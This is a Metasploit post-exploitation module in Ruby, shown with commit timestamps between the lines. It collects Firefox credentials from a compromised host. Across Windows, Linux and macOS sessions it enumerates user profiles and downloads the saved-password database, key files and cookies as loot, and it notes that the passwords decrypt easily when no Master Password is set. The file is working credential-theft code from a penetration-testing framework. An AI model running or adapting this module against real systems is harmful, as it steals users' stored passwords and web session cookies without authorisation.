2011-03-05 02:57:32 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2011-03-05 02:57:32 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'msf/core/post/file'
|
2011-08-20 05:13:17 +00:00
|
|
|
require 'msf/core/post/windows/user_profiles'
|
2011-03-05 02:57:32 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Post::File
|
2011-08-20 05:13:17 +00:00
|
|
|
include Msf::Post::Windows::UserProfiles
|
2011-03-05 02:57:32 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info(info,
|
2011-04-27 16:25:15 +00:00
|
|
|
'Name' => 'Multi Gather Firefox Signon Credential Collection',
|
2011-03-05 02:57:32 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module will collect credentials from the Firefox web browser if it is
|
|
|
|
installed on the targeted machine. Additionally, cookies are downloaded. Which
|
|
|
|
could potentially yield valid web sessions.
|
|
|
|
|
2011-10-17 03:49:49 +00:00
|
|
|
Firefox stores passwords within the signons.sqlite database file. There is also a
|
2011-03-05 02:57:32 +00:00
|
|
|
keys3.db file which contains the key for decrypting these passwords. In cases where
|
2011-10-17 03:49:49 +00:00
|
|
|
a Master Password has not been set, the passwords can easily be decrypted using
|
|
|
|
third party tools. If a Master Password was used the only option would be to
|
2011-03-05 02:57:32 +00:00
|
|
|
bruteforce.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => ['bannedit'],
|
|
|
|
'Version' => '$Revision$',
|
2012-10-23 18:33:01 +00:00
|
|
|
'Platform' => ['win', 'linux', 'bsd', 'unix', 'osx'],
|
2011-03-05 02:57:32 +00:00
|
|
|
'SessionTypes' => ['meterpreter', 'shell' ]
|
|
|
|
))
|
2011-10-17 03:49:49 +00:00
|
|
|
#TODO
|
2011-03-05 02:57:32 +00:00
|
|
|
# - add support for decrypting the passwords without a Master Password
|
|
|
|
# - Collect cookies.
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2011-10-16 04:36:08 +00:00
|
|
|
paths = []
|
2011-05-12 17:56:18 +00:00
|
|
|
print_status("Determining session platform and type...")
|
2011-03-05 02:57:32 +00:00
|
|
|
case session.platform
|
|
|
|
when /unix|linux|bsd/
|
|
|
|
@platform = :unix
|
|
|
|
paths = enum_users_unix
|
|
|
|
when /osx/
|
|
|
|
@platform = :osx
|
|
|
|
paths = enum_users_unix
|
|
|
|
when /win/
|
2011-08-20 05:13:17 +00:00
|
|
|
if session.type != "meterpreter"
|
|
|
|
print_error "Only meterpreter sessions are supported on windows hosts"
|
2011-05-12 17:56:18 +00:00
|
|
|
return
|
|
|
|
end
|
2011-10-16 04:36:08 +00:00
|
|
|
|
2011-08-20 05:13:17 +00:00
|
|
|
grab_user_profiles().each do |user|
|
|
|
|
next if user['AppData'] == nil
|
2011-10-16 04:36:08 +00:00
|
|
|
dir = check_firefox(user['AppData'])
|
2011-08-20 05:13:17 +00:00
|
|
|
if dir
|
|
|
|
paths << dir
|
|
|
|
end
|
2011-03-05 02:57:32 +00:00
|
|
|
end
|
|
|
|
else
|
|
|
|
print_error("Unsupported platform #{session.platform}")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
if paths.nil?
|
|
|
|
print_error("No users found with a Firefox directory")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2011-10-17 05:54:20 +00:00
|
|
|
download_loot(paths.flatten)
|
2011-03-05 02:57:32 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def enum_users_unix
|
|
|
|
id = whoami
|
2011-10-11 19:01:09 +00:00
|
|
|
if id.nil? or id.empty?
|
2011-03-05 02:57:32 +00:00
|
|
|
print_error("This session is not responding, perhaps the session is dead")
|
|
|
|
end
|
|
|
|
|
|
|
|
if @platform == :osx
|
|
|
|
home = "/Users/"
|
|
|
|
else
|
|
|
|
home = "/home/"
|
|
|
|
end
|
|
|
|
|
|
|
|
if got_root?
|
2011-04-18 14:31:01 +00:00
|
|
|
userdirs = session.shell_command("ls #{home}").gsub(/\s/, "\n")
|
2011-03-05 02:57:32 +00:00
|
|
|
userdirs << "/root\n"
|
|
|
|
else
|
|
|
|
print_status("We do not have root privileges")
|
|
|
|
print_status("Checking #{id} account for Firefox")
|
2012-02-24 14:44:42 +00:00
|
|
|
if @platform == :osx
|
|
|
|
firefox = session.shell_command("ls #{home}#{id}/Library/Application\\ Support/Firefox/Profiles/").gsub(/\s/, "\n")
|
|
|
|
else
|
|
|
|
firefox = session.shell_command("ls #{home}#{id}/.mozilla/firefox/").gsub(/\s/, "\n")
|
|
|
|
end
|
2011-04-18 14:31:01 +00:00
|
|
|
|
2011-03-05 02:57:32 +00:00
|
|
|
firefox.each_line do |profile|
|
|
|
|
profile.chomp!
|
|
|
|
next if profile =~ /No such file/i
|
|
|
|
|
|
|
|
if profile =~ /\.default/
|
|
|
|
print_status("Found Firefox Profile for: #{id}")
|
2012-02-24 14:44:42 +00:00
|
|
|
if @platform == :osx
|
|
|
|
return [home + id + "/Library/Application\\ Support/Firefox/Profiles/" + profile + "/"]
|
|
|
|
else
|
|
|
|
return [home + id + "/.mozilla/" + "firefox/" + profile + "/"]
|
|
|
|
end
|
2011-03-05 02:57:32 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# we got root check all user dirs
|
|
|
|
paths = []
|
|
|
|
userdirs.each_line do |dir|
|
|
|
|
dir.chomp!
|
|
|
|
next if dir == "." || dir == ".."
|
|
|
|
|
|
|
|
dir = home + dir + "/.mozilla/firefox/" if dir !~ /root/
|
|
|
|
if dir =~ /root/
|
|
|
|
dir += "/.mozilla/firefox/"
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Checking for Firefox Profile in: #{dir}")
|
|
|
|
|
2011-04-18 14:31:01 +00:00
|
|
|
stat = session.shell_command("ls #{dir}")
|
|
|
|
if stat =~ /No such file/i
|
2011-03-05 02:57:32 +00:00
|
|
|
print_error("Mozilla not found in #{dir}")
|
|
|
|
next
|
|
|
|
end
|
|
|
|
stat.gsub!(/\s/, "\n")
|
|
|
|
stat.each_line do |profile|
|
|
|
|
profile.chomp!
|
|
|
|
if profile =~ /\.default/
|
|
|
|
print_status("Found Firefox Profile in: #{dir+profile}")
|
|
|
|
paths << "#{dir+profile}"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return paths
|
|
|
|
end
|
|
|
|
|
|
|
|
def check_firefox(path)
|
|
|
|
paths = []
|
|
|
|
path = path + "\\Mozilla\\"
|
|
|
|
print_status("Checking for Firefox directory in: #{path}")
|
2011-03-29 04:43:02 +00:00
|
|
|
|
2011-03-29 04:47:01 +00:00
|
|
|
stat = session.fs.file.stat(path + "Firefox\\profiles.ini") rescue nil
|
2011-03-29 03:50:32 +00:00
|
|
|
if !stat
|
2011-03-29 03:56:46 +00:00
|
|
|
print_error("Firefox not found")
|
2011-03-29 03:50:32 +00:00
|
|
|
return
|
|
|
|
end
|
2011-03-29 04:43:02 +00:00
|
|
|
|
2011-03-05 02:57:32 +00:00
|
|
|
session.fs.dir.foreach(path) do |fdir|
|
|
|
|
if fdir =~ /Firefox/i and @platform == :windows
|
|
|
|
paths << path + fdir + "Profiles\\"
|
|
|
|
print_good("Found Firefox installed")
|
|
|
|
break
|
|
|
|
else
|
|
|
|
paths << path + fdir
|
|
|
|
print_status("Found Firefox installed")
|
|
|
|
break
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2011-03-29 03:27:01 +00:00
|
|
|
if paths.empty?
|
2011-03-29 03:56:46 +00:00
|
|
|
print_error("Firefox not found")
|
2011-03-29 03:27:01 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2011-03-05 02:57:32 +00:00
|
|
|
print_status("Locating Firefox Profiles...")
|
|
|
|
print_line("")
|
|
|
|
path += "Firefox\\Profiles\\"
|
2011-03-29 03:56:46 +00:00
|
|
|
|
2011-03-05 02:57:32 +00:00
|
|
|
# we should only have profiles in the Profiles directory store them all
|
2011-03-29 04:47:01 +00:00
|
|
|
begin
|
|
|
|
session.fs.dir.foreach(path) do |pdirs|
|
|
|
|
next if pdirs == "." or pdirs == ".."
|
|
|
|
print_good("Found Profile #{pdirs}")
|
|
|
|
paths << path + pdirs
|
|
|
|
end
|
|
|
|
rescue
|
|
|
|
print_error("Profiles directory missing")
|
|
|
|
return
|
2011-03-05 02:57:32 +00:00
|
|
|
end
|
2011-04-18 14:31:01 +00:00
|
|
|
|
2011-03-05 02:57:32 +00:00
|
|
|
if paths.empty?
|
|
|
|
return nil
|
|
|
|
else
|
|
|
|
return paths
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def download_loot(paths)
|
|
|
|
loot = ""
|
|
|
|
paths.each do |path|
|
2012-03-02 22:45:42 +00:00
|
|
|
print_status(path)
|
|
|
|
profile = path.scan(/Profiles[\\|\/](.+)$/).flatten[0].to_s
|
2011-03-05 02:57:32 +00:00
|
|
|
if session.type == "meterpreter"
|
|
|
|
session.fs.dir.foreach(path) do |file|
|
|
|
|
if file =~ /key\d\.db/ or file =~ /signons/i or file =~ /cookies\.sqlite/
|
|
|
|
print_good("Downloading #{file} file from: #{path}")
|
|
|
|
file = path + "\\" + file
|
|
|
|
fd = session.fs.file.new(file)
|
2011-03-29 04:43:02 +00:00
|
|
|
begin
|
|
|
|
until fd.eof?
|
2012-03-02 08:18:07 +00:00
|
|
|
data = fd.read
|
|
|
|
loot << data if not data.nil?
|
2011-03-29 04:43:02 +00:00
|
|
|
end
|
|
|
|
rescue EOFError
|
|
|
|
ensure
|
|
|
|
fd.close
|
2011-03-05 02:57:32 +00:00
|
|
|
end
|
2011-11-20 01:53:25 +00:00
|
|
|
|
2011-03-05 02:57:32 +00:00
|
|
|
ext = file.split('.')[2]
|
|
|
|
if ext == "txt"
|
|
|
|
mime = "plain"
|
|
|
|
else
|
|
|
|
mime = "binary"
|
|
|
|
end
|
|
|
|
file = file.split('\\').last
|
2012-03-02 22:45:42 +00:00
|
|
|
store_loot("ff.profile.#{file}", "#{mime}/#{ext}", session, loot, "firefox_#{file}", "#{file} for #{profile}")
|
2011-03-05 02:57:32 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
if session.type != "meterpreter"
|
2011-04-18 14:31:01 +00:00
|
|
|
files = session.shell_command("ls #{path}").gsub(/\s/, "\n")
|
2011-03-05 02:57:32 +00:00
|
|
|
files.each_line do |file|
|
|
|
|
file.chomp!
|
|
|
|
if file =~ /key\d\.db/ or file =~ /signons/i or file =~ /cookies\.sqlite/
|
|
|
|
print_good("Downloading #{file}\\")
|
2011-04-18 14:31:01 +00:00
|
|
|
data = session.shell_command("cat #{path}#{file}")
|
2011-03-05 02:57:32 +00:00
|
|
|
ext = file.split('.')[2]
|
|
|
|
if ext == "txt"
|
|
|
|
mime = "plain"
|
|
|
|
else
|
|
|
|
mime = "binary"
|
|
|
|
end
|
|
|
|
file = file.split('/').last
|
2012-03-02 22:45:42 +00:00
|
|
|
store_loot("ff.profile.#{file}", "#{mime}/#{ext}", session, loot, "firefox_#{file}", "#{file} for #{profile}")
|
2011-03-05 02:57:32 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def got_root?
|
|
|
|
case @platform
|
|
|
|
when :windows
|
|
|
|
if session.sys.config.getuid =~ /SYSTEM/
|
|
|
|
return true
|
|
|
|
else
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
else # unix, bsd, linux, osx
|
|
|
|
ret = whoami
|
|
|
|
if ret =~ /root/
|
|
|
|
return true
|
|
|
|
else
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def whoami
|
|
|
|
if @platform == :windows
|
|
|
|
return session.fs.file.expand_path("%USERNAME%")
|
|
|
|
else
|
2011-04-18 14:31:01 +00:00
|
|
|
return session.shell_command("whoami").chomp
|
2011-03-05 02:57:32 +00:00
|
|
|
end
|
|
|
|
end
|
2011-03-05 20:21:12 +00:00
|
|
|
end
|